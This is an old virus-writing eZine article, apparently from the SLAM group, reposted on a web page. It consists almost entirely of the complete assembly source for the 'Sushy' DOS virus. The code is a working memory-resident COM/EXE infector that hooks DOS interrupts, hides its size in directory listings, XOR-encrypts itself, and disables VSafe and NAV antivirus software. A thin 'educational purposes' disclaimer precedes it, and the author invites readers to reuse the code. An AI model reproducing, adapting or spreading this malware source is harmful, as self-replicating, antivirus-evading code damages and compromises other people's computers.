Copy Link
Add to Bookmark
Report

SLAM4.042: Sushy by Blue Skull/SLAM

eZine's profile picture
Published in 
Slam
 · 2 years ago

[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[] 
( )
) ‹‹‹ ‹ ‹ ‹‹‹ ‹ ‹ ‹ ‹ (
( € fl € € € fl € € € € )
) flfl€ € € flfl€ €fl€ fl€fl (
( €‹€ €‹€ €‹€ € € € )
) (
( )
) Coded By (
( )
) Blue Skull/SLAM (
( )
[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]-[]


DISCLAIMER

THIS VIRUS WAS WRITTEN FOR EDUCATIONAL PURPOSES ONLY. I TAKE NO RESPONSABILITY FOR DAMAGES THIS VIRUS COULD CAUSE. I'LL NEVER EVER SPREAD THIS VIRUS PERSONALLY. YOU MAY FREELY RIPE OFF THE CODE AS LONG AS YOU DON'T WANT TO USE IT IN DESTRUCTIVE VIRII.

This one is an EXE/COM/TSR/Encrypted/Stealth/Retro/Payload and is dedicated to my little intoxicated cat named Sushy.

I coded the virus in about two days and I hope that everything works as it should.

You won't find too many comments in here but just take a look at the names of the procedures and you'll figure out what they are supposed to do.

;This are so called flags and they make the coding in asm much easier. 

True Equ 1
False Equ 0

Release Equ True

If Release
Retro Equ True
Payload Equ True
EXE_Infector Equ True
COM_Infector Equ True
Infect_Test_EXE Equ True
Display_Infos Equ True
Test_Mode_On Equ False ;Debug Flag
Else
Retro Equ False
Payload Equ True
EXE_Infector Equ True
COM_Infector Equ True
Infect_Test_EXE Equ False
Display_Infos Equ False
Test_Mode_On Equ True ;Debug Flag
Endif

If Test_Mode_On
Interrupt_Encrypted Equ False
Else
Interrupt_Encrypted Equ True
Endif

Virus_Length Equ Virus_End-Virus_Begin
File_Virus_Length Equ Virus_Length
Memory_Virus_Length Equ Virus_Length*2+10H
File_Encrypted_Length Equ De_Encrypt - Install
Memory_Encrypted_Length Equ New_Int_21H - Far_Jump
Find_First_FCB Equ 11H
Find_Next_FCB Equ 12H
Get_Current_Driver Equ 19H
Get_DTA Equ 2FH
Get_Version Equ 30H
File_Open Equ 3DH
File_Open_Read_Write Equ 3D02H
File_Close Equ 3EH
File_Read Equ 3FH
File_Write Equ 40H
Set_Get_File_Attributes Equ 43H
Get_File_Attributes Equ 4300H
Set_File_Attributes Equ 4301H
File_Move_Begin Equ 4200H
File_Move_End Equ 4202H
Get_Mem Equ 48H
Set_Mem Equ 4AH
Run_Program Equ 4BH
Find_First_DTA Equ 4EH
Find_Next_DTA Equ 4FH
Get_PSP Equ 51H
Get_Dos_List Equ 52H
Rename Equ 56H
Get_Time_Date Equ 5700H
Set_Time_Date Equ 5701H
File_Open_Extended Equ 6C00H
Minimal_Size Equ 4000H

;And here are some macros.

Write_Message Macro Message
If Test_Mode_On
Push DS
Push CS
Pop DS
Mov DX,Offset Message
Add DX,BP
Mov AH,09H
Int 21H
Pop DS
Endif
Endm

Retro_Stuff Macro
If Retro
Mov DX,05945H ;In case that someone still
Mov AX,0FA01H ;uses VS.
Int 16H
Mov DI,04E55H ;And this is for NAV
Mov SI,04E41H
Mov AX,0FE02H
Int 2FH
Endif
Endm

Sushy Segment
Assume DS:Sushy,ES:Sushy,SS:Sushy,CS:Sushy

Org 0000H
Byte_0000H Equ This Byte
Org 0001H
Word_0001H Equ This Word
Org 0002H
Byte_0002H Equ This Byte
Org 0413H
Word_0413H Equ This Word

Org 00H
Virus_Begin Equ This Byte

Far_Jump Proc
Mov AX,CS
Virus_Segment Equ This Byte
Add AX,0000H
Push AX
Virus_Offset Equ This Byte
Mov AX,Offset De_Encrypt_File_Virus
Push AX
Retf
Far_Jump Endp

De_Encrypt_File_Virus Proc
Push CS
Pop DS
Install_Difference Equ This Word
Mov BP,0000H
Mov SI,Offset Install
Add SI,BP
Mov CX,File_Encrypted_Length
Call De_Encrypt
De_Encrypt_File_Virus Endp

Install Proc
Write_Message Message
Push ES
Pop DS
Push ES
Pushf
If Payload
Call D_Payload
Endif
Call Verify_If_Installed
Jc No_Install
Retro_Stuff
Push CS
Pop AX
Call Install_Da_New_Interrupt
Nop ;DON'T REMOVE !!!
No_Install:
Popf
Write_Message Second_Message
Push CS
Pop DS
Pop ES
Mov SI,Offset Original_Beginning
Add SI,BP
Mov DI,0100H+'BS' ;This is for the
Sub DI,'BS' ;'O'-TBAV-Flag
Bytes_To_Exchange Equ This Word
Mov CX,0000H
Repz
Movsb
Mov AX,ES
COMEXE_Difference Equ This Word
Add AX,0010H
Add Word PTR CS:[BP+Begin_Segment],AX
Add Word PTR CS:[BP+Stack_Segment+1],AX
Push ES
Pop DS
File_Length_Hi_Word Equ This Word
Mov BX,0000H
File_Length_Lo_Word Equ This Word
Mov CX,0000H
Cli
Stack_Segment Equ This Word
Mov AX,0000H
Mov SS,AX
Stack_Offset Equ This Word
Mov SP,0000H
Sti
Xor AX,AX
Xor DX,DX
Xor BP,BP
Xor SI,SI
Xor DI,DI
DB 0EAH
Begin_Offset DW Offset Exit_Code
Begin_Segment DW 0000H
Install Endp

Verify_If_Installed Proc ;It's used to check out if it's
Mov SI,'SU' ;already installed in memory.
Mov DX,'SH'
Mov CX,'Y!'
Mov BX,'BS'
Mov AL,'X'
Mov AH,30H
Int 21H
Cmp AL,'X'
Jne Not_Installed
Stc
Ret
Not_Installed:
Clc
Ret
Verify_If_Installed Endp

Install_Da_New_Interrupt Proc
Call Memory_Manipulation
Push CS
Pop DS
Mov SI,BP
Xor DI,DI
Mov CX,Offset File_Virus_Length
Repz
Movsb
Mov AL,00H
Mov Byte PTR ES:[Offset De_Encrypt+1],AL
Mov Byte PTR ES:[Offset Int_Counter],AL
Xor BX,BX
Mov DS,BX
Push ES
Pop AX
Mov SI,21H*4
Mov DI,Offset Old_Int_21H
Movsw
Movsw
Cli
Mov Word PTR [SI-002H],AX
Mov Word PTR [SI-004H],Offset New_Int_21H
Sti
Ret
Install_Da_New_Interrupt Endp

Memory_Manipulation Proc ;It searches for memory space.
Call UMB_Part
Jc Memory_Manipulation_Exit
Call MCB_Part
Memory_Manipulation_Exit:
Ret
Memory_Manipulation Endp

UMB_Part Proc
Push DS
Clc
Xor DI,DI
Mov AH,Get_DOS_List
Int 21H
LDS SI,ES:[BX+12H]
Mov AX,Word PTR [SI+1FH]
Cmp AX,0FFFFH
Jne UMB_OK
Jmp UMB_Part_Exit
UMB_OK:
Mov DS,AX
Cmp Byte PTR [DI],'M'
Jne UMB_Part_Exit
Another_UMB_Check:
Mov AX,Word PTR [DI+0003H]
Mov BX,Word PTR [DI+0001H]
Or BX,BX
Jnz Not_A_Free_UMB
Cmp AX,Memory_Virus_Length/16+10H
Jg Found_A_Free_UMB
Not_A_Free_UMB:
Mov BH,Byte PTR [DI]
Cmp BH,'Z'
Je UMB_Part_Exit
Inc AX
Push DS
Pop BX
Add AX,BX
Mov DS,AX
Jmp Another_UMB_Check
Found_A_Free_UMB:
Sub AX,Memory_Virus_Length/16+1
Dec AX
Mov DX,AX
Push DS
Pop AX
Add AX,Memory_Virus_Length/16+1
Inc AX
Push AX
Pop ES
Mov AL,Byte PTR [DI]
Mov Byte PTR ES:[DI],AL
Mov Word PTR ES:[DI+01H],0000H
Mov Word PTR ES:[DI+03H],DX
Mov Byte PTR [DI],'M'
Mov Word PTR [DI+01H],0008H
Mov Word PTR [DI+03H],Memory_Virus_Length/16+1
Mov Word PTR [DI+08H],'CS'
Mov AX,DS
Inc AX
Mov ES,AX
Stc
UMB_Part_Exit:
Pop DS
Ret
UMB_Part Endp

MCB_Part Proc
Xor DI,DI
Mov AX,DS
Dec AX
Mov DS,AX
Mov AX,Memory_Virus_Length / 16 + 2
Sub Word PTR [DI+03H],AX
Sub Word PTR [DI+12H],AX
Mov AX,Word PTR [DI+12H]
Mov ES,AX
Mov Byte PTR [DI],'M'
Mov AL,'Z'
Stosb
Mov AX,0008H
Stosw
Mov AX,Memory_Virus_Length / 16 + 1
Stosw
Mov Word PTR ES:[DI+3],'CS'
Mov AX,ES
Inc AX
Mov ES,AX
Ret
MCB_Part Endp

If Payload
D_Payload Proc
In AL,40H
Cmp AL,0AAH
Jne D_Payload_Exit
Write_Message Sushy_Message
D_Payload_Exit:
Ret
D_Payload Endp
Endif

Level_Int_21H Proc
CLD
Cmp AH,Find_First_FCB
Je Directory_Stealth
Cmp AH,Find_Next_FCB
Je Directory_Stealth
Cmp AH,Find_First_DTA
Je Directory_Stealth
Cmp AH,Find_Next_DTA
Je Directory_Stealth
Cmp AH,Get_Version
Je Install_Check
Cmp AH,File_Open
Je Interfere
Cmp AH,File_Close
Je Interfere
Cmp AH,Set_Get_File_Attributes
Je Interfere
Cmp AH,Run_Program
Je Interfere
Cmp AH,Rename
Je Interfere
Cmp AX,File_Open_Extended
Jne Far_Jump_Exit
Mov DX,SI
Interfere:
Call Second_Int_21H_Level
Jmp Far_Jump_Exit
Directory_Stealth:
Call Dir_Interfere
Jmp Far_Jump_Exit
Install_Check:
Call Install_Flags
Jc Iret_Exit
Far_Jump_Exit:
Mov Byte PTR CS:[Offset Far_Jump_Or_Iret],0EAH
Ret
Iret_Exit:
Mov Byte PTR CS:[Offset Far_Jump_Or_Iret],0CFH
Ret
Level_Int_21H Endp

Second_Int_21H_Level Proc
Mov BP,AX
Mov SI,DX
Load_Byte:
Lodsb
Or AL,AL
Jnz Load_Byte
Sub SI,0005H
Lodsb
Cmp AL,'.'
Jne First_Int_21H_Level_Exit
Lodsw
And AX,0DFDFH
Mov DI,AX
Lodsb
And AL,0DFH
Mov CL,AL
Call Extensions_Check
Jnc First_Int_21H_Level_Exit
Call Install_New_Int_24H
Call Virus_Engine
Call Deinstall_New_Int_24H
First_Int_21H_Level_Exit:
Ret
Second_Int_21H_Level Endp

Dir_Interfere Proc
Cmp AH,Find_First_FCB
Je FCB
Cmp AH,Find_Next_FCB
Jne No_FCB
FCB:
Call Int_21H
Or AL,AL
Jz Dir_Interfere_Error
Mov AH,Get_PSP
Call Int_21H
Mov ES,BX
Cmp ES:[0016H],BX
Jne Dir_Interfere_Exit
Mov AX,Get_DTA
Call Int_21H
Cmp Byte PTR ES:[BX],0FFH
Jne No_Extended_FCB
Add BX,0007H
No_Extended_FCB:
Mov DI,Word PTR ES:[BX+09H]
Mov CL,Byte PTR ES:[BX+0BH]
Mov CH,Byte PTR ES:[BX+16H]
Lea SI,[BX+1DH]
Jmp Check_For_Modify
No_FCB:
Call Int_21H
Jc Dir_Interfere_Error
Mov AH,Get_DTA
Call Int_21H
Lea SI,ES:[BX+001EH]
Reach_The_End:
Mov AL,Byte PTR ES:[SI]
Inc SI
Or AL,AL
Jnz Reach_The_End
Cmp Byte PTR ES:[SI-4],'.'
Jne Dir_Interfere_Exit
Mov DI,Word PTR ES:[SI-03H]
Mov CL,Byte PTR ES:[SI-01H]
Mov CH,Byte PTR ES:[BX+16H]
Lea SI,[BX+1AH]
Check_For_Modify:
Call Dir_Interfere_Modify
Jmp Dir_Interfere_Exit
Dir_Interfere_Error:
Clc
Ret
Dir_Interfere_Exit:
Stc
Ret
Dir_Interfere Endp

Dir_Interfere_Modify Proc
Call Extensions_Check
Jnc No_Length_Modify
Check_For_Time:
Cmp CH,55H
Jne Dir_Interfere_Exit
Sub Word PTR ES:[SI],File_Virus_Length
Sbb Word PTR ES:[SI+0002H],0000H
No_Length_Modify:
Ret
Dir_Interfere_Modify Endp

Virus_Engine Proc ;It's used to infect and desinfect
Mov AX,BP ;files.
Mov CL,AH
Cmp CL,03EH
Je Infect_On_Close
Mov AX,Get_File_Attributes
Call Int_21H
Jc Virus_Engine_Exit
Mov BX,CX
Xor CX,CX
Mov AX,Set_File_Attributes
Call Int_21H
Jc Virus_Engine_Exit
Mov AX,File_Open_Read_Write
Call Int_21H
Jb Virus_Engine_Exit
Push DX
Push DS
Push BX
Mov BX,AX
Push CS
Pop DS
Push CS
Pop ES
Call Verify_If_Virused
Jnc It_Is_Clean
Mov DX,BP
Cmp DX,File_Open_Extended
Je Desinfection
Cmp DH,File_Open
Jne Close_File
Desinfection:
Call Recovery_The_File
Jmp Close_File
It_Is_Clean:
Call Opened_Checks
Close_File:
Mov AH,File_Close
Call Int_21H
Pop CX
Pop DS
Pop DX
Mov AX,Set_File_Attributes
Call Int_21H
Jmp Virus_Engine_Exit
Infect_On_Close:
Cmp BX,04H
Jna Virus_Engine_Exit
Mov BP,BX
Mov AX,1220H
Int 2FH
Jc Virus_Engine_Exit
Mov BL,Byte PTR ES:[DI]
Cmp BL,0FFH
Je Virus_Engine_Exit
Mov AX,1216H
Int 2FH
Jc Virus_Engine_Exit
Mov DI,Word PTR ES:[DI+28H]
Mov CL,Byte PTR ES:[DI+2AH]
Call Extensions_Check
Mov BX,BP
Call Opened_Checks
Virus_Engine_Exit:
Ret
Virus_Engine Endp

Opened_Checks Proc
Xor DX,DX
Xor CX,CX
Mov AX,File_Move_Begin
Call Int_21H
Jc Opened_Checks_Exit
Mov DX,Offset Buffer
Mov CX,00020H
Mov AH,File_Read
Call Int_21H
Jc Opened_Checks_Exit
Call File_Length
Mov CX,AX
Mov AX,Word PTR Buffer
Cmp AL,'Z'
Jne MZ_Sequence
Cmp AH,'M'
Je It_Is_An_EXE
MZ_Sequence:
Cmp AL,'M'
Jne It_Is_Not_An_EXE
Cmp AH,'Z'
Je It_IS_An_EXE
It_Is_Not_An_EXE:
Cmp CX,Minimal_Size
Jb Opened_Checks_Exit
Cmp CX,0F000H
Jnb Opened_Checks_Exit
Call Prepare_Da_COM
Jmp Go_For_Infection
It_Is_An_EXE:
Cmp DX,00000H
Jne Big_Enough
Cmp CX,Minimal_Size
Jb Opened_Checks_Exit
Cmp Byte PTR [Buffer+18H],'@' ;Infect no Micro$hit
Je Opened_Checks_Exit ;Windows and
Cmp Word PTR [Buffer+1AH],00H ;overlayed filez.
Jne Opened_Checks_Exit ;Remember I'm up to good.
Big_Enough:
Call Prepare_Da_EXE
Go_For_Infection:
Call Write_Da_Virus
Opened_Checks_Exit:
Ret
Opened_Checks Endp

Verify_If_Virused Proc
Call File_Length
Mov CX,DX
Mov DX,AX
Sub DX,Offset Virus_End-Offset Signature
SBB CX,0
Mov AX,File_Move_Begin
Call Int_21H
Mov DX,Offset Buffer
Mov CX,Signature_Length
Mov AH,File_Read
Call Int_21H
Xor DX,DX
Xor CX,CX
Mov AX,File_Move_Begin
Call Int_21H
Mov AL,Byte PTR [Offset Buffer]
Xor AL,Signature
Mov Byte PTR [Offset De_Encrypt+1],AL
Mov SI,Offset Buffer
Mov CX,Signature_Length
Call De_Encrypt
Mov SI,Offset Signature
Mov DI,Offset Buffer
Mov CX,Signature_Length
Repz
Cmpsb
Jne Not_Virused
Stc
Ret
Not_Virused:
Clc
Ret
Verify_If_Virused Endp

Recovery_The_File Proc ;It cleans the file if case
Mov AX,Get_Time_Date ;some program tries to open
Call Int_21H ;it. I just love the idea.
Push CX
Push DX
Call File_Length
Mov CX,DX
Mov DX,AX
Sub DX,Offset Virus_End-Offset Original_Beginning
Sbb CX,0000H
Mov AX,File_Move_Begin
Call Int_21H
Mov DX,Offset Buffer
Mov CX,0020H
Mov AH,File_Read
Call Int_21H
Mov SI,Offset Buffer
Mov CX,0020H
Call De_Encrypt
Xor DX,DX
Xor CX,CX
Mov AX,File_Move_Begin
Call Int_21H
Mov DX,Offset Buffer
Mov CX,0020H
Mov AH,File_Write
Call Int_21H
Jc No_Recovery_Possible
Call File_Length
Mov CX,DX
Mov DX,AX
Sub DX,File_Virus_Length
Sbb CX,0000H
Mov AX,File_Move_Begin
Call Int_21H
Xor DX,DX
Xor CX,CX
Mov AH,File_Write
Call Int_21H
No_Recovery_Possible:
Pop DX
Pop CX
Mov CL,00H
Mov AX,Set_Time_Date
Call Int_21H
Ret
Recovery_The_File Endp

Write_Da_Virus Proc
Mov AX,Get_Time_Date
Call Int_21H
Push CX
Push DX
Xor DX,DX
Xor CX,CX
Mov AX,File_Move_Begin
Call Int_21H
Mov DX,Offset Buffer
Bytes_To_Modify Equ This Word
Mov CX,0000H
Mov AH,File_Write
Call Int_21H
Jb Write_Da_Virus_Exit
Call File_Length
Call New_Mask
Xor SI,SI
One_More_Block:
Mov DI,Offset Buffer
Mov CX,File_Virus_Length
Repz
Movsb
Mov SI,Offset Buffer + (Offset Install - Offset Virus_Begin)
Mov CX,File_Encrypted_Length
Call De_Encrypt
Xor DX,DX
Xor CX,CX
Mov AX,File_Move_End
Call Int_21H
Mov DX,Offset Buffer
Mov CX,File_Virus_Length
Mov AH,File_Write
Call Int_21H
Write_Da_Virus_Exit:
Pop DX
Pop CX
Jb No_Virus_Mark
Mov CL,55H
No_Virus_Mark:
Mov AX,Set_Time_Date
Call Int_21H
Ret
Write_Da_Virus Endp

Prepare_Da_COM Proc
Mov Word PTR CS:[COMEXE_Difference+1],00000H
Mov Word PTR CS:[Bytes_To_Modify+1],00003H
Mov Word PTR CS:[Bytes_To_Exchange+1],00003H
Mov Word PTR [Stack_Segment+1],00000H
Mov Word PTR [Stack_Offset+1],0FFFEH
Mov Word PTR [Begin_Segment],00000H
Mov Word PTR [Begin_Offset],00100H
Call File_Length
Add AX,0100H
Adc DX,0000H
Push AX
Mov Word PTR [File_Length_Hi_Word+1],DX
Mov Word PTR [File_Length_Lo_Word+1],AX
Mov CX,00010H
Div CX
Mov Word PTR [Install_Difference+1],DX
Add DX,Offset De_Encrypt_File_Virus
Mov Word PTR [Virus_Segment+1],AX
Mov Word PTR [Virus_Offset+1],DX
Mov SI,Offset Buffer
Mov DI,Offset Original_Beginning
Mov CX,00020H
Repz
Movsb
Pop AX
Mov Byte PTR CS:[Buffer],0E9H
Add AX,0FEFDH
Add AX,Offset Far_Jump
Mov Word PTR CS:[Buffer+1],AX
Ret
Prepare_Da_COM Endp

Prepare_Da_EXE Proc
Mov Word PTR CS:[COMEXE_Difference+1],00010H
Mov Word PTR CS:[Bytes_To_Modify+1],00020H
Mov Word PTR CS:[Bytes_To_Exchange+1],00000H
Mov AX,Word PTR [Buffer+00EH]
Mov Word PTR [Stack_Segment+1],AX
Mov AX,Word PTR [Buffer+010H]
Mov Word PTR [Stack_Offset+1],AX
Mov AX,Word PTR [Buffer+014H]
Mov Word PTR [Begin_Offset],AX
Mov AX,Word PTR [Buffer+016H]
Mov Word PTR [Begin_Segment],AX
Mov SI,Offset Buffer
Mov DI,Offset Original_Beginning
Mov CX,00020H
Repz
Movsb
Call File_Length
Mov Word PTR [File_Length_Hi_Word+1],DX
Mov Word PTR [File_Length_Lo_Word+1],AX
Push AX
Push DX
Mov CX,00010H
Div CX
Sub AX,Word PTR [Buffer+008H]
Mov Word PTR [Install_Difference+1],DX
Add DX,Offset Far_Jump
Mov Word PTR [Buffer+00EH],AX
Mov Word PTR [Buffer+010H],01000H
Mov Word PTR [Buffer+014H],DX
Mov Word PTR [Buffer+016H],AX
Add DX,De_Encrypt_File_Virus-Far_Jump
Mov Word PTR [Virus_Segment+1],0000H
Mov Word PTR [Virus_Offset+1],DX
Pop DX
Pop AX
Add AX,File_Virus_Length
Adc DX,00000H
Mov CX,00200H
Div CX
Add AX,00001H
Mov Word PTR [Buffer+002H],DX
Mov Word PTR [Buffer+004H],AX
Ret
Prepare_Da_EXE Endp

File_Length Proc
Xor DX,DX
Xor CX,CX
Mov AX,File_Move_End
Call Int_21H
Ret
File_Length Endp

New_Mask Proc
Get_Another_Mask_Value:
In AL,040H
Or AL,AL
Jz Get_Another_Mask_Value
Mov Byte PTR [Offset De_Encrypt + 1],AL
Ret
New_Mask Endp

Install_Flags Proc
Cmp SI,'SU'
Jne No_Flags
Cmp DX,'SH'
Jne No_Flags
Cmp CX,'Y!'
Jne No_Flags
Cmp BX,'BS'
Jne No_Flags
Stc
Ret
No_Flags:
Clc
Ret
Install_Flags Endp

Int_21H Proc
Pushf
Call CS:[Old_Int_21H]
Ret
Int_21H Endp

New_Int_24H Proc
Mov AL,03H
Iret
New_Int_24H Endp

Install_New_Int_24H Proc
Push DS
Push ES
Xor AX,AX
Mov DS,AX
Mov AX,CS
Mov ES,AX
Mov SI,90H
Mov DI,Offset Int_24H_Offset
Movsw
Movsw
Mov Word PTR [SI-02H],AX
Mov Word PTR [SI-04H],Offset New_Int_24H
Pop ES
Pop DS
Ret
Install_New_Int_24H Endp

Deinstall_New_Int_24H Proc
Push DS
Push ES
Push CS
Pop DS
Xor AX,AX
Mov ES,AX
Mov SI,Offset Int_24H_Offset
Mov DI,90H
Movsw
Movsw
Pop ES
pop DS
Ret
Deinstall_New_Int_24H Endp

Int_24H_Offset DW 0000H
Int_24H_Segment DW 0000H

Original_Beginning DB 20H DUP (0)

;_______________________________________________________________________________
;ENTRY
; DI - The first two letters
; CL - The third letter
;_______________________________________________________________________________
Extensions_Check Proc
Clc
Cmp DI,'OC'
Jne Search_For_EXE
Cmp CL,'M'
Je Found_An_Extension
Search_For_EXE:
Cmp DI,'XE'
Jne No_Match
Cmp CL,'E'
Je Found_An_Extension
No_Match:
Ret
Found_An_Extension:
Stc
Ret
Extensions_Check Endp

Signature DB 'Sushy'
Signature_Length Equ This Byte - Signature
Handle DB 'Blue Skull^SLAM'
Sushy_Message DB 'L.ong L.ife S.ushy !!!',0DH,0AH,'$'

New_Int_21H Proc
Pushf
Push AX
Push BX
Push CX
Push DX
Push SI
Push DI
Push BP
Push ES
Push DS
If Interrupt_Encrypted
Call De_Encrypt_Interrupt
Inc Byte PTR CS:[Offset Int_Counter]
Endif
Pop DS
Push DS
Call Level_Int_21H
If Interrupt_Encrypted
Dec Byte PTR CS:[Offset Int_Counter]
Call De_Encrypt_Interrupt
Endif
Pop DS
Pop ES
Pop BP
Pop DI
Pop SI
Pop DX
Pop CX
Pop BX
Pop AX
Popf
Far_Jump_Or_Iret DB 0EAH
Old_Int_21H Equ This DWord
DD 00000080H
New_Int_21H Endp

De_Encrypt_Interrupt Proc
Push CS
Pop DS
Mov AL,Byte PTR [Offset Int_Counter]
Or AL,AL
Jnz De_Encrypt_Exit
Xor SI,SI
Mov CX,Memory_Encrypted_Length
De_Encrypt_Interrupt Endp

De_Encrypt Proc
Mov AL,00H
Not_Over:
Xor [SI],AL
Inc SI
Loop Not_Over
De_Encrypt_Exit:
Ret
De_Encrypt Endp

If Test_Mode_On
Message DB 'FUCK DA RULEZ !!!',0DH,0AH,'$'
Second_Message DB 'FUCK THEM ALL !!!',0DH,0AH,'$'
Endif

Virus_End Equ This Byte
Int_Counter DB 00H
Buffer Equ This Word

Exit_Code Proc
Push CS
Pop DS
If Display_Infos
Push CS
Pop ES
Mov DX,Offset Info_Message
Mov AH,09H
Int 21H
Mov AX,Virus_Length
Mov SI,Offset Hex_Table
Mov DI,Offset Virus_Length_Hex_Offset
Call Calculate_The_Hex_Values
Call Calculate_The_Hex_Values
Mov DX,Offset Virus_Length_Message
Mov AH,09H
Int 21H
Endif
If Test_Mode_On
Mov DX,Offset File_Name
Mov AX,4300H
Int 21H
Endif
Mov AX,4C00H
Int 21H
Exit_Code Endp

If Display_Infos
Calculate_The_Hex_Values Proc
Xchg AH,AL
Push AX
Mov AH,00H
Push AX
Mov CL,04H
Shr AL,CL
Mov BX,AX
Mov AL,Byte PTR [SI+BX]
Stosb
Pop AX
And AL,0FH
Mov BX,AX
Mov AL,Byte PTR [SI+BX]
Stosb
Pop AX
Ret
Calculate_The_Hex_Values Endp
Endif

If Test_Mode_On
If Infect_Test_EXE
File_Name DB 'D:\Asm\Virus\Test.EXE',0
Else
File_Name DB 'D:\Asm\Virus\Test.COM',0
Endif
Endif

If Display_Infos
Info_Message DB 'This is the SUSHY virus !!!',0DH,0AH,'$'
Virus_Length_Message DB 'Length: '
Virus_Length_Hex_Offset DB 00H,00H,00H,00H,'H.',0DH,0AH,'$'
Hex_Table DB '0123456789ABCDEF'
Endif

Sushy Ends
End De_Encrypt_File_Virus

← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT